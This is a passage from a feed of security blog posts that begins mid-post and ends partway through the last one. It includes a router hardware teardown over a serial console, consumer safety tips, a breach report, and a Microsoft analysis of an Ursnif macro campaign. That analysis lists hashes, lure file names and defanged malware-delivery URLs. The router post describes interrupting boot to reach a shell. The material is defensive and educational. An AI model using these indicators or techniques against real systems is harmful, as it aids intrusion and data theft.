In order to get a better look, we did some online shopping. We purchased a “third hand” to hold the mainboard. This portable router is bolted straight to a transformer for the sake of compactness. This means we are in the proximity of 120 Volts, so we should exercise a modicum of caution.

This device is compact and tightly integrated. The chips on the mainboard are pretty small, and our eyesight isn’t what it used to be. Back to the Internet to get a jeweler’s lamp.

So now we had the magnifying lamp, and it is much better than the little one that comes with the third hand. The LED lights also made examining the main board much easier.

To interact with these pins, we could solder wires in, but we’re planning on using this device, provided it passes muster. This meant we were going to try and be as delicate with our probing as we could. Back to the Internet. After some searching, we found breakaway headers.

Snapping four off the length make for a perfect pinout adapter. No solder needed, plus easy access for eventually connecting the USB header and for probing the pins.

Shopping

Now we needed to investigate what those diagnostic pins were. Did they have voltage? Were they used to send and receive information? Back to the Internet again for more shopping.

Not wanting to buy something too cheap or inappropriate for the task, we Googled affordable voltmeter and found a review for decent and affordable voltmeters. We settled on the Extech EX330 Autoranging Mini Multi-Meter with Built-In Thermometer and Type K Remote Probe.

We also purchased the additional probe connectors kit for good measure. We started with checking for voltage. The bottom half of the router is the transformer. It typically steps down from 120 Volts to 12 Volts. We set the voltmeter to 200 Volts, just to be safe, and got to probing.

Diving in

The bottom plated-through hole had a square about it. Maybe it was special? So we started by applying the ground to it and power to the top pin, and the result was -3.3 Volts. Quickly inverting the probes gave us +3.3 Volts.

Some quick Googling told us that there are two common voltages used in these types of interfaces: 3.3 Volts and 5 Volts. It looks like our router is of the 3.3 Volts variety, the top pin is ground, and the bottom square pin is positive with 3.3 Volts.

So now we knew what the top and bottom pins were. This left the two center pins as a mystery.

Many other much more talented people than us have gone down this particular rabbit hole, and in this, Google was invaluable. We found pictures of other UART interfaces on other routers.

It does not appear that there’s a standardized pin order, but in most of the examples we found online, gnd (ground) and VCC are at the outer edges.

In our case, VCC would stand for “Voltage Common Collector.” More Googling indicated that there is a cable available to interface with these pins and, most importantly, that you don’t need to connect the 3.3 Volt pin unless you want to watch your cable, your router, and potentially your computer go “poof-the-magic-dragon.”

Good to know. Let’s also store this tidbit of information for later.

More shopping

So back to more shopping. We found a USB to RS232 TTL UART PL2303HX Converter USB to COM Cable Adapter Module.

We also found some that specified that they came with both voltage selections and, just to be thorough, we also ordered one of these. It wasn’t available with Prime, so we’re still waiting for this to arrive from the slow boat from China.

Back to the investigation

Not being one to assume anything, we also researched what the color coding was for the cable, as it came in a little bubble wrap with no instructions and sadly nothing in the packaging to indicate whether it was of the 3.3 Volts or 5 Volts variety. Similar USB to UART cables had documentation on the web. We made an assumption and theorized that the cable coloring would be the same as the Google picture results (fingers crossed).

Roadblocks

Colors matched: black for ground, red for power, green for receive, white for transmit. So far, so good. We plugged in the UART to USB cable in our test machine and encountered another roadblock.

While it was properly detected and Windows did install the correct drivers, it didn’t work. Some investigation revealed the device could not start.

We tried moving the USB device to a different com port in the device manager with no success. We tried downloading the driver directly from the Prolific website and again weren’t met with success. We also tried moving the USB device to a different port (from USB v3 to regular USB). Again, no go.

Digging a little further into the properties of the device revealed that the device cannot start.

Researching this error yielded this forum post. And more specifically, to this entry:

“Windows 8/8.1/10 are NOT supported in PL-2303HXA and PL-2303X EOL (End Of Life) chip versions.”

So while this USB dongle presumably works, it won’t work in Windows 10. What a surprise! Not to be easily defeated, we rebooted into Ubuntu Linux with the USB dongle still attached.

We then proceeded to check if the USB to serial adapter was working. This is achieved by issuing this command:

$ dmesg | grep tty

So now we know that the USB adapter is ttyUSB0. The Windows forum mentioned the pl2303 chipset in the adapter wasn’t supported, and we see it here. In Windows, we would’ve used the Putty terminal program. In Linux, we elected to use GtkTerm. It was installed with this command:

$ sudo apt-get install gtkterm

We found that for best results, invoking GtkTerm from bash needed sudo. (We suspect it needed the user account to be part of a group that has permissions to access the ports.)

$ sudo gtkterm

Once gtkterm was running, we needed to select the proper port. We selected the configuration option and opened the port option.

In the port drop-down menu, at the very bottom, we saw /dev/ttyUSB0. This is the Prolific USB adapter.

We left parity bit, stop bit, and flow control to the defaults and hoped for the best.

After this came the tedious task of determining which of the two pins in the center were transmit and receive, as well as the correct baud rate. Our first attempt was gnd, rx  tx and vcc unconnected. <-VCC = 3.3V = poof! bad!

These were the results we got. Either TX and RX are inverted, or we have selected the wrong baud rates. There is some kind of communication taking place, but the contents are all garbled. We went through the most common baud rates, but were not met with any success.

We then flipped the TX and RX and started the process of unplugging and re-plugging the transformer portion of the router, while incrementing the available baud rates in GtkTerm. When selecting the 57600 baud rate, we were met with success!

We could now see how this portable router starts up. It uses u-boot (1.1.3). As the system is starting, there is a brief moment where you are offered options:

If you enter “4” at just the right moment, it interrupts the boot process and dumps you at a prompt. This is probably the menu used at the factory to apply the correct firmware and perform quality assurance checks and confirm that the unit isn’t defective. Some of the options look like they could be destructive and brick the device, so we were careful in our selection.

Entering “help” gives you a list of the commands available at the u-boot command line.

Printenv gives even further information. We could re-flash this unit. We could reset the unit. All of this is good, but doesn’t really help us ascertain the security posture of the device.

We kept navigating the menus looking for interesting things to do, but the U-Boot environment was pretty limited. We also discovered that if you let the boot process take place normally and press any key once it is done, you are dumped at a command prompt as well.

Navigating to the available directories revealed a set of folders: cfg, net, and os. These folders contain files. They are not subdirectories. They don’t have an extension. When invoked individually with no switches, they show a Usage description.

What we learned so far

So what have we learned about the security of this device? Someone with local access could probably modify its behavior quite easily.

The documentation on the chipset mentions that the “[REDACTED] embedded with 8MB memory and provide eCos turnkey for compact router…”

We have a sneaky suspicion that this is the underlying operating system. We know that the U-Boot for MIPS boot loader turns control over to “something” once it’s done initializing the hardware. Turnkey sounds easy, and easy is usually what manufacturers go for.

The wiki for eCos has interesting entries under the “Criticism” heading:

The FreeBSD TCP/IP network stack included with eCos is out of date (circa 2001) and exposes systems to numerous security and stability vulnerabilities (FreeBSD RELENG 4 4 0 RELEASE for IPv4 and FreeBSD’s origin KAME for IPv6). Official eCos maintainers do not appear to monitor FreeBSD or KAME for security or stability updates, but rather rely on minimal and insufficient bug reports from users of eCos.[citation needed]

The SNMP package is rudimentary at best, once again, apparently due to its age.[original research?]

Retrospection

Let’s look at what it has taken so far to gather this information. Some specialized tools, some specialized hardware, some non-trivial computer knowledge, and a certain amount of pig-headedness. And after all this, we haven’t even found anything remotely close to a glaring vulnerability. We know more about our device, and that’s a good thing. However, there’s no way that an average user will go through this. It’s a cool exercise. But it isn’t realistic to expect average users to reverse their devices.

What next?

We want to confirm what the OS is 100 percent and not just rely on a “hunch.” Remember the firmware update we collected from the [REDACTED] website? We’ll try to extract information from the .img file. We are hoping that the update will contain information that is useful. We’re also interested in dumping the local firmware off of the router as well. We’re doing this so we can compare the original firmware with the modified, updated one, as well as to see what was corrected or changed and maybe figure out what was the issue that this update addressed.

Maybe they implemented a fix that only partially fixes the issue? Maybe they fixed the problem and not the underlying vulnerability? All of these questions are worthy of an answer.

Do you see something I’ve done wrong? Have suggestions on other things to try? Reach out to @jean_taggart on the Twitters. I’m keenly interested to hear from all of you.

The post Assessing the security of a portable router: a look inside its hardware appeared first on Malwarebytes Labs.

New Pokémon Go settings highlight importance of parental controls

Pokémon Go has been a massive success story for smartphone gaming. Simple to play, and with an emphasis on taking more exercise, the game is popular with adults and children alike.

In the past, anyone could create an account to play Pokémon Go using their Google of Facebook login details. But for many parents, this sign-up process was concerning.

All or nothing

By providing a Google or Facebook account to Pokémon Go, the developers of the game, Niantic, also gain access to those social accounts. Without any way to limit access, Niantic can “see” everything on that account, and to share it with their business partners.

Clearly this is undesirable – and unnecessary – for a kid’s game. But until now there has not been any way to control data sharing.

To address these concerns, Niantic has created the ‘Niantic Kids’ platform. Built with the assistance of ESRB Privacy Certified experts Super Awesome, Niantic Kids promises to help parents better protect their kids without ruining the game.

Niantic Kids is fully compliant with a range of international privacy laws, including GDPR in Europe and the Children’s Online Privacy Protection Act in the USA. By signing up for a Niantic Kids account, parents will be able to limit the amount of information shared with Pokémon Go – and better protect the privacy of their kids.

A lesson in smartphone safety

The reality is that Pokémon Go isn’t the only app harvesting potentially sensitive data from your child’s smartphone. Many “free” apps and games generate income by sharing the information they collect from your phone with advertisers, data aggregators and other partners.

The default settings on most apps will be to enable sharing – parental controls are almost never enabled as standard (even the parental controls in Panda Dome must be manually enabled). It is absolutely essential that you check each app installed on your child’s phone and use the parental controls to limit access to their information.

It is not just apps you need to check either. Apple’s iOS (installed on iPhones and iPads) has a number of additional privacy settings to give parents greater control over devices. Android devices have similar controls which need to be applied on your child’s phone.

Child safety applies to all devices

To properly protect your children you should enable parental controls on all of their devices. So if they have access to a laptop or desktop computer, you need to look at ways to protect their privacy, and to restrict access to adult or illegal content.

Again, Mac OS (installed on iMacs and MacBooks) and Windows come with basic parental controls as standard. But these tools tend to be quite limited in what they can do. Instead we recommend installing Panda Dome (free trial available here).

Panda Dome makes it easy to block unwanted websites and to see how the computer is being used. These reports provides clues about your child’s online behaviour, and provide a useful opportunity to discuss how to use the Internet safely.

Parental controls are not about stopping your kids from having fun online. They are designed to help your kids have fun online safely.

You can read more about keeping kids safe online in our Parental Controls media centre.

The post New Pokémon Go settings highlight importance of parental controls appeared first on Panda Security Mediacenter.

Cyber Security Tricks and Treats

When it comes to cybersecurity, there are very few treats to be enjoyed.

With internet usage at an all-time high, users are especially vulnerable to cyber attacks and hacks. These tricks can include phishing attacks, session hijacking and ransomware. And since it’s National Cyber Security Awareness Month, it’s the perfect time to brush up on cyber security knowledge, and find out how you can make a treat out of a trick this Halloween season.

This Halloween, keep your devices and personal information safe from hackers’ tricks. If something looks wrong or feels too good to be true, it probably is. Ensure all devices have the most current updates, install an antivirus and use a VPN when necessary.

Get started today.

Download Panda Free Antivirus, and defeat the evil gremlins who could turn your Halloween into a nightmare.

The post Cyber Security Tricks and Treats appeared first on Panda Security Mediacenter.

5 InfoSec Trends To Watch For

The infosec industry is booming, so it’s no surprise that new challenges and cyber threats will face IT departments for the years to come. With that in mind, what are the InfoSec trends we should all watch out for?

According to the Ponemon Institute, the global average cost of a data breach is down 10% over previous years to $3.62 million. However, this does not mean you should let your guards down. Here are some of the InfoSec trends you should watch out for:

Ransomware keeps growing

With 34% of people globally willing to pay a ransom to get their data back, and an increasing 64% for Americans, cybercriminals are more than ever motivated to raise their stakes… in terms of victims, and ransom demands.

Higher demand for skilled professionals 

InfoSec jobs require specialized skills and extensive practical training. More sophisticated threats and techniques are discovered every day and require professionals to stay up-to-date. To address this issue, and stay up-to-date on the latest skills and techniques, we recommend lots of reading, constant studying and practicing (every 3-6 months).

Trusting one or a team of individuals to protect and defend their digital assets has become an issue for companies (see next point). For this reason, we’ll see more and more temporary-hired professionals such as bug bounty hunters, consultants, free-lancers, etc.

Data breaches are on the rise

According to The Economist, oil no longer is the World’s most valuable resource, data is. Data is growing faster than ever before, and by the year 2020, about 1.7 megabytes of new information will be created every second for every human being. In the quest for more power, cybercriminals are making data their favorite past-time.

In addition, a global survey from Symantec suggests that 50% of employees keeps confidential corporate data after leaving or losing their jobs, putting insiders’ threats at the same level of risk. Finding the right bodies to protect and defend their assets remains an important key goal for corporations in 2018.

Attackers get smarter

With new technologies, software, and techniques developed each day – and with sanctions getting harder – attackers have no other option than getting smarter themselves… or put their skills up to defending organizations instead. To catch a hacker, you must first think like one.

Cyber risk insurance becomes more common

As the InfoSec industry evolves, we might see more of cyber insurance coverage for loss of trust with their customers, loss of future revenue from negative media, and improvement costs for security infrastructure or system upgrades.

Aspiring to become a Web Application Penetration Tester? Learn updated web app security skills with a free trial of the WAPTv3 training:
Get My Free Trial

Interested in knowing more about how we can help develop your IT Security team and new hires’ skill set? Click here to schedule a corporate demo

Sources: CSO, Information Age, CMS Wire, Forbes

Connect with us on Social Media:

Twitter | Facebook | LinkedIn | Instagram

British Airways Website and App Compromised

The customer data of more than 380,000 people have been compromised. British Airways (BA), the largest airline in the United Kingdom, operating flights to almost every major city in the US, has been attacked by hackers.

Cybercriminals have stolen the personal and financial details of hundreds of thousands of BA customers. The data includes credit card details and other banking information, as well as names, addresses, and phone numbers of people who have used the website and the app between 22:58 BST August 21st, 2018 and 21:45 BST September 5th, 2018. According to British Airways, the stolen data does not include passport details. Currently is not known if the hackers have been able also to access saved cards on the website.

The data breach was announced earlier this week on the company’s blog. According to the statement released by BA, the breach is now resolved, and both the website and the app are safe to use. The airline carrier has hired a team of experts who currently are investigating the cause of the breach. BA has notified the police and all relevant authorities about the incident. It is still unknown who is behind the attack and if the stolen data has already been used for fraudulent transactions.

Alex Cruz, British Airways’ Chairman, and Chief Executive Officer said “We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously.”

The UK airline has already started approaching the potential victims assuring them to keep an eye on their bank accounts and report any unusual account activities to the bank. If you’ve purchased anything from British Airways over the last few weeks, your identity and finances might be in potential trouble.

British Airways angered its customers by tweeting about the leak instead of approaching the victims directly. Even though BA is a company that bills itself as the world’s favorite airline, this is an excellent example that even companies that strive to take data protection very seriously sometimes fall victims to hackers and experience technical issues.

It is your responsibility to change passwords at least once every three months, monitor your bank statements, and have antivirus software installed on all your connected devices – hackers know that people will be expecting emails from BA and will start sending phishing emails.

Keep your eyes wide open and don’t fall victim!

Download your Antivirus

The post British Airways Website and App Compromised appeared first on Panda Security Mediacenter.

Small businesses targeted by highly localized Ursnif campaign

Cyber thieves are continuously looking for new ways to get people to click on a bad link, open a malicious file, or install a poisoned update in order to steal valuable data. In the past, they cast as wide a net as possible to increase the pool of potential victims. But attacks that create a lot of noise are often easier to spot and stop. Cyber thieves are catching on that we are watching them, so they are trying something different. Now were seeing a growing trend of small-scale, localized attacks that use specially crafted social engineering to stay under the radar and compromise more victims.

In social engineering attacks, is less really more?

A new malware campaign puts that to the test by targeting home users and small businesses in specific US cities. This was a focused, highly localized attack that aimed to steal sensitive info from just under 200 targets. Macro-laced documents masqueraded as statements from legitimate businesses. The documents are then distributed via email to target victims in cities where the businesses are located.

With Windows Defender AVs next gen defense, however, the size of the attack doesnt really matter.

Several cloud-based machine learning algorithms detected and blocked the malicious documents at the onset, stopping the attack and protecting customers from what would have been the payload, info-stealing malware Ursnif.

The map below shows the location of the targets.

Figure 1. Geographic distribution of target victims

Highly localized social engineering attack

Heres how the attack played out: Malicious, macro-enabled documents were delivered as email attachments to target small businesses and users. Each document had a file name that spoofed a legitimate business name and masqueraded as a statement from that business. In total, we saw 21 unique document file names used in this campaign.

The attackers sent these emails to intended victims in the city or general geographic area where the businesses are located. For example, the attachment named Dolan_Care_Statement.doc was sent almost exclusively to targets in Missouri. The document file name spoofs a known establishment in St. Louis. While we do not believe the establishment itself was affected or targeted by this attack, the document purports to be from the said establishment when its really not.

The intended effect is for recipients to get documents from local, very familiar business or service providers. Its part of the social engineering scheme to increase likelihood that recipients will think the document is legitimate and take the bait, when in reality it is a malicious document.

Most common lure document file names Top target cities
Dockery_FloorCovering_Statement Johnson City, TN
Kingsport, TN
Knoxville, TN
Dolan_Care_Statement St. Louis, MO
Chesterfield, MO
Lees Summit, MO
DMS_Statement Omaha, NE
Wynot, NE
Norwalk, OH
Dmo_Statement New Braunfels, TX
Seguin, TX
San Antonio, TX
DJACC_Statement Miami, FL
Flagler Beach, FL
Niles, MI
Donovan_Construction_Statement Alexandria, VA
Mclean, VA
Manassas, VA

Table 1. Top target cities of most common document file names

When recipients open the document, they are shown a message that tricks the person into enabling the macro.

Figure 2. Document tricks victim into enabling the macro

As is typical in social engineering attacks, this is not true. If the recipient does enable the macro, no content is shown. Instead the following process is launched to deobfuscate a PowerShell command.

Figure 3. Process to deobfuscate PowerShell

Figure 4. PowerShell command

The PowerShell script connects to any of 12 different URLs that all deliver the payload.

Figure 5. Deobfuscated PowerShell command

The payload is Ursnif, info-stealing malware. When run, Ursnif steals information about infected devices, as well as sensitive information like passwords. Notably, this infection sequence (i.e., cmd.exe process deobfuscates a PowerShell that in turn downloads the payload) is a common method used by other info-stealing malware like Emotet and Trickbot.

How machine learning stopped this small-scale, localized attack

As the malware campaign got under way, four different cloud-based machine learning models gave the verdict that the documents were malicious. These four models are among a diverse set of models that help ensure we catch a wide range of new and emerging threats. Different models have different areas of expertise; they use different algorithms and are trained on their unique set of features.

One of the models that gave the malicious verdict is a generic model designed to detect non-portable executable (PE) threats. We have found that models like this are effective in catching social engineering attacks, which typically use non-PE files like scripts and, as is the case for this campaign, macro-laced documents.

The said non-PE model is a simple averaged perceptron algorithm that uses various features, including expert features, fuzzy hashes of various file sections, and contextual data. The simplicity of the model makes it fast, enabling it to give split-second verdicts before suspicious files could execute. Our analysis into this specific model showed that the expert features and fuzzy hashes had the biggest impact in the models verdict and the eventual blocking of the attack.

Figure 6. Impact of features used by one ML model that detected the attack

Next-generation protection against malware campaigns regardless of size

Machine learning and artificial intelligence power Windows Defender Antivirus to detect and stop new and emerging attacks before they can wreak havoc. Every day, we protect customers from millions of distinct, first-seen malware. Our layered approach to intelligent, cloud-based protection employs a diverse set of machine learning models designed to catch the wide range of threats: from massive malware campaigns to small-scale, localized attacks.

The latter is a growing trend, and we continue to watch the threat landscape to keep machine learning effective against attacks. In a recent blog post, we discussed how we continue to harden machine learning defenses.

Windows Defender AV delivers the next-gen protection capabilities in the Windows Defender Advanced Threat Protection (Windows Defender ATP). Windows Defender ATP integrates attack surface reduction, next-gen protection, endpoint detection and response (EDR), automatic investigation and response, security posture, and advanced hunting capabilities. .

Because of this integration, antivirus detections, such as those related to this campaign, are surfaced in Windows Defender Security Center. Using EDR capabilities, security operations teams can then investigate and respond to the incident. Attack surface reduction rules also block this campaign, and these detections are likewise surfaced in Windows Defender ATP.To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

Across the whole Microsoft 365 threat protection, detections and other security signals are shared among Office 365 ATP, Windows Defender ATP, and Azure ATP. In this Ursnif campaign, the antivirus detection also enables the blocking of related emails in Office 365. This demonstrates how signal sharing and orchestration of remediation across solutions in Microsoft 365 results in better integrated threat protection.

 

 

Bhavna Soman
Windows Defender Research

 

Indicators of compromise (IOCs)

Infector:

Hashes
407a6c99581f428634f9d3b9ec4b79f79c29c79fdea5ea5e97ab3d280b2481a1
77bee1e5c383733efe9d79173ac1de83e8accabe0f2c2408ed3ffa561d46ffd7
e9426252473c88d6a6c5031fef610a803bce3090b868d9a29a38ce6fa5a4800a
f8de4ebcfb8aa7c7b84841efd9a5bcd0935c8c3ee8acf910b3f096a5e8039b1f

File names
CSC_Statement.doc
DBC_Statement.doc
DDG_Statement.doc
DJACC_Statement.doc
DKDS_Statement.doc
DMII_Statement.doc
dmo_statement.doc
DMS_Statement.doc
Dockery_Floorcovering_Statement.doc
Docktail_Bar_Statement.doc
doe_statement.doc
Dolan_Care_Statement.doc
Donovan_Construction_Statement.doc
Donovan_Engineering_Statement.doc
DSD_Statement.doc
dsh_statement.doc
realty_group_statement.doc
statement.doc
tri-lakes_motors_statement.doc
TSC_Statement.doc
UCP_Statement.doc

Payload (Ursnif)

Hashes
31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f
bd23a2eec4f94c07f4083455f022e4d58de0c2863fa6fa19d8f65bfe16fa19aa
75f31c9015e0f03f24808dca12dd90f4dfbbbd7e0a5626971c4056a07ea1b2b9
070d70d39f310d7b8842f645d3ba2d44b2f6a3d7347a95b3a47d34c8e955885d
15743d098267ce48e934ed0910bc299292754d02432ea775957c631170778d71

URLs
hxxp://vezopilan[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://cimoselin[.]com/tst/index[.]php?l=soho2[.]tkn
hxxp://cimoselin[.]com/tst/index[.]php?l=soho4[.]tkn
hxxp://vedoriska[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://baberonto[.]com/tst/index[.]php?l=soho3[.]tkn

hxxp://hertifical[.]com/tst/index[.]php?l=soho8[.]tkn
hxxp://hertifical[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://condizer[.]com/tst/index[.]php?l=soho1[.]tkn
hxxp://vezeronu[.]com/tst/index[.]php?l=soho2[.]tkn
hxxp://vezeronu[.]com/tst/index[.]php?l=soho5[.]tkn

hxxp://zedrevo[.]com/tst/index[.]php?l=soho8[.]tkn
hxxp://zedrevo[.]com/tst/index[.]php?l=soho10[.]tkn

*Note: The first four domains above are all registered in Russia and are hosted on the IP address 185[.]212[.]44[.]114. The other domains follow the same URL pattern and are also pushing Ursnif, but no registration info is available.

 

 

 

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community and Windows Defender Security Intelligence.

Follow us on Twitter @WDSecurity and Facebook Windows Defender Security Intelligence.

The post Small businesses targeted by highly localized Ursnif campaign appeared first on Microsoft Secure.

Five school cybersecurity questions you should ask on your next parent-teacher conference

The summer is officially over, and children are back to school! Whether you are at work or left home alone, you are probably feeling a mixture of relief and sadness. Even though you always keep them in mind, your precious bundles of joy are now away from you for the most of the day.

Children spend more time in front of the little screens than ever. We are sure that you’ve given them plenty of pieces of advice on how to stay safe in both the real world and the online one. You most likely already have full control over their digital life and have installed parental control software on their connected devices. However, sometimes the children are not the only ones who need some cybersecurity education, the school employees may need some guidance too. Even if you are one of the lucky parents who send their children to schools that ban the use of smartphones on learning grounds, there are a few questions concerning the safety of your children that you should raise next time you speak with the school administration.

What information do schools keep on your children and who has access to it?

The school system stores a lot of information about your children. It often includes standard directory information such as names, addresses, and phone numbers as well as more sensitive data such as SSN and DOB. All information is generally protected by the federal Family Educational Rights and Privacy Act (FERPA). However, many educational institutions sometimes grant access to such information to school employees who do not need it but can take advantage of it. It’s always worth asking the question!

What happens if the school becomes a target of a ransomware attack?

Educational institutions are targets of hacker attacks all the time. Sometimes the attackers request a ransom. Asking what would the procedure be if your children personal details get stolen is a must. Knowing more about what does the school do to prevent such attacks is also a good question. Educational entities are often underfunded and do not have the resources to take good care of their students’ cybersecurity needs. Knowing more about such procedures must be on your checklist every time you choose a school.

How often do children and school employees change passwords?

Following the right procedures for password maintenance is a must for educational entities that store such sensitive information and must be implemented on both students and employees. The last thing you want is for hackers to steal the identity of innocent children and ruin their lives before they even have a chance to defend themselves. SSNs generally never change so the information taken now might be used 5-10 years from now when the children become adults. Best practices say that passwords should never be reused and they must be changed every three months.

What data is kept after students and employees leave the school?

Educational entities are supposed to deactivate the accounts of former students and employees. However, this is not always the case as it is known that some accounts are often overlooked and left active for years. The IT departments either do it by mistake or do the students/employees a favor so they can continue taking advantage of the educational benefits – as you know some services, including Apple Music, provide discounts through educational email verification. Such unmonitored accounts could sometimes be used by hackers to get into the internal systems of educational institutions.

What steps does your school administration do to prevent school cyberbullying?

The fight against cyberbullying, access to inappropriate websites, online predators and dangerous games such as the Blue Whale Challenge starts at school – proper cybersecurity education would help both students and employees. Students will know how to not only protect themselves but also report inappropriate behavior, and pedagogues will increase their knowledge in spotting disturbing actions. This is questions that need to be discussed on a regular basis as technology trends change all the time and staying up-to-date is not an easy task, especially in underfunded and underperforming schools.

For some of the questions, there is not a right answer, nor a wrong one. However, raising the topics is vital as it will encourage educational institutions to always be on top of their game, and will give you the peace of mind you need.

Download your Antivirus

The post Five school cybersecurity questions you should ask on your next parent-teacher conference appeared first on Panda Security Mediacenter.

Practical application of artificial intelligence that can transform cybersecurity

As I write this blog post, Im sitting by the beach on my computer in a sunny destination while my family plays in the water. Were on vacation, but we all have our own definition of fun. For me its writing blogs on the beachreally! The headspace is outstanding for uninterrupted thinking time and focus. However, my employer may not find my vacation destination to be the safest place to access certain applications and data. They want me to strongly authenticate, and they want to understand the health of the systems and devices I am using, as well as the network and geolocation. But thanks to the power of machine learning and conditional access I am able to write this blog when and where I want. My employer is able to enforce all-encompassing security measures to ensure my device, location, and network are safe and confirm its really me trying to sign in.

The ability for my organization to reason over all of the data, including location, device health, sign-in, and app health, is just one example of the way artificial intelligence (AI) is helping us evolve the tools we use to fight cybercrime. In this post Ill focus on two practical use cases for deploying AI in the cybercrime battlefield. In the first example, I explain how layering AI onto on-premises Security Information and Event Management (SIEM) solutions can give you better insights and predictive capabilities. The second use case is the one I just hinted at, which is how we can take AI even further to protect user access. By the end I hope Ive proven to you that there is tremendous opportunity to use AIparticularly machine learningto improve the efficacy of cybersecurity, the detection of hackers, and even prevent attacks before they occur.

If you are skeptical, I understand. I often tell a story about how for many years at the annual RSA Conference, vendors and customers rallied around themes such as the year of the smart card, the year of biometrics, “the year of machine learning, the year of blockchain. Some of these technologies never lived up to their promise, and many are still nascent and immature in their application, architecture, and use cases. But I think there are practical applications of AI that will meet our expectations, especially when it comes to cybersecurity. If one reflects on broad based attacks like WannaCry and NotPetya and critical vulnerabilities like Spectre and Meltdown, it only stands to reason that the attack surface is rapidly growing, the bad actors are becoming more sophisticated, and the need for tool evolution is compelling. AI is the path to that evolution. As an industry, we need to be cautious in how we position and explain machine learning and AI, avoiding confusion, conflating capabilities, and overpromising results. There is definitely a place for both, and they are highly complementary. AI has the power to deliver on some of the legacy promise of machine learning, but only if it is trained, architected, and implemented properly.

Like all technologies, there is a risk that AI will be misused or poorly used. For the purpose of this blog, I ask you to make the assumption that the tech is being used ethically, the engines are properly trained in a non-biased manner, and the user understands the full capability of the technology they are deploying. Am I asking you to suspend reality? No, I am simply asking you to imagine the potential if we fully harness AI to further improve our cybersecurity defenses and recognize the threat of bad actors who will also embrace AI now and in the future. Please also read The Future Computed: Artificial Intelligence and its role in society by Brad Smith and Harry Shum for a broader vision on AI and its role in society.

Using AI to gain powerful insights

There are several use cases where AI is interesting for cybersecurity applications but lets first start with what is possibly the most obvious use casemaking sense of signal and intelligence. Collective sigh readers before continuing. I understand the consternation related to legacy SIEM solutions, and your visceral response. SIEM solutions were purpose-built to collect logs and data from a wide range of sources, largely for compliance, and they do this particularly well. They also enable users to effectively produce reporting specific to a use case. They do not, however, work well in detecting real-time attacks and allowing an organization to automate and/or orchestrate defenses that will minimize damage to the organization.

Take a moment to think about how powerful it would be to apply the machine learning algorithms that exist today to the data and logs that SIEM collects. AI could reason over the data at global scale in near real-time using the cloud and produce attack scenarios, which you could then tie to a security operations tool that automates the response and defenses based on the outcome of the AI reasoning. With a large volume of globally sourced data, you could use AI to look at anomalies in the behavior patterns of humans, devices, data, and applications at scale and make accurate predictions of the threats to your enterpriseallowing you to deploy defenses well in advance of a specific attack. AI, when trained and deployed properly, has the ability to allow your enterprise to be this effective. You can continue to gain value from the on-premise SIEM infrastructure you built and use the data you gathered for historical context. The cloud provides a true value in this use case in its ability to analyze the data at a global scale. And finally, AI will become predictive as it learns what is normal and what isnt normal. You can then automate responses via tooling that will allow your admins to focus only on the highest value tasks.AI will reduce the workload of security administrators in the short term, reducing duplication and increasing efficacy of signal.

Intelligently secure conditional access

My ability to write this blog from the beach is evidence that todays systems for conditional access are good and getting better. The ability to provide access control based on the authentication of the user, device, data, application, and known geo-location provide us a certain level of confidence. The tools that exist can potentially maintain state, have the potential to be quite granular, and are powered by global cloud networks. They often use machine learning to detect anomalous behavior, but todays tooling suffers from a dependence on legacy architecture, technical debt, dependence on the integration of disparate authentication systems, and hybrid systems. The tooling is often built for just one environment, one use case, or one system of record. In most large, complex enterprises, security admins dont have the luxury of using the most up-to-date tools for a single environment or use case. Their environments are complex, the attack surface is large, and their users are often unaware of sophisticated security risks. I encounter this in my own home when I explain to family members the inherent risks of free, public Wi-Fi, as an example.

AI for conditional access use cases is not only practical, its necessary. We have long lived with an employee base that is working from a large variety of personal and company-issued devices and working from a wide range of locations including corporate owned office space, shared work facilities, coffee houses, hotel rooms, conference facilities, and other global locations. There is also still a gap in the security industry related to the percentage of the population that owns and successfully deploys Multi-Factor Authentication (MFA) tooling. Biometrics HAS actually made MFA more ubiquitous by reducing the friction and expense of purchasing and deploying authentication systems, but organizations are still not investing in MFA across 100 percent of their enterprises. Cybersecurity, like many fields, operates on a risk model. High risk applications and users equal higher security profiles and tools. Now, imagine if we can reduce the risk while also reducing the friction of rolling out tools? AI is dependent on data and good architects and developers to truly live up to its promise, but it is systems agnostic. The data you supply from your mainframe is not ranked higher in priority than the data you supply from the cloud, unless you create a scenario where you desire specific data types to be higher priority or ordinal in ranking.

Conditional accesspowered by AI reasoning over the behavior of the user, device, data, application, network, location, etc.has the ability to create much safer data access for companies and reduce the overall risk. Imagine a dynamic, real-time, global environment whereregardless of where your users choose to workyou can determine their precise level of access and change their level of access in real-time without human intervention. Did something change that causes concern, and would you like your user to reauthenticate? Do you want to block access to some or all systems? Do you want to block access to certain data sets or require some level of encryption? The AI enginelinked with automated toolingwill give you this ability and provide the logging and reporting needed to support the automated actions or human intervention. Your ability to integrate with current tooling to enforce the actions will be the highest bar to full usage in your environment.

There are no silver bullets when it comes to technology and, particularly, cybersecurity. I have talked about two use cases where I believe AI can improve cybersecurity, but there are others a well, such as AI’s ability to allow more robust device-related IoT detection, sophisticated malware detection, and improvements in vulnerability management. The bad actors will continue to innovate and create weapons that can be deployed for large scale attacks. The attack surface is growing with the proliferation of IoT devices on corporate networks on control systems. As an industry, we have a moral responsibility and imperative to continue improving processes, training, and technology to meet new and yet to be developed threats. Artificial intelligence is one weapon in our tool bag. It must be used prudently. And when used effectively, it can truly be a change agent for the industry. Check out my blog, Application fuzzing in the era of Machine Learning and AI, where I wrote about application fuzzing and AI.

Check back in a month when I will blog about how we can use AI to improve device-related IoT detection. In the meantime, I invite you to follow me at @ajohnsocyber.

The post Practical application of artificial intelligence that can transform cybersecurity appeared first on Microsoft Secure.

Protecting user identities

Image of four hands collaborating over a drawing of a lightbulb.

This is a blog series that responds to common questions we receive from customers about the deployment of Microsoft 365 security solutions. In this series, youll find context, answers, and guidance for deployment and driving adoption within your organization. Check out Cybersecurity threats: How to discover, remediate, and mitigate, the third blog in our eight-part series on deploying Intelligent Security scenarios.

Its not just a problem for consumers. Identity theft in the workplace is also on the riseand with good reason. Stealing employee credentials is an easy path to bypassing security around sensitive data, making unauthorized purchases, and many other cybercrimes.

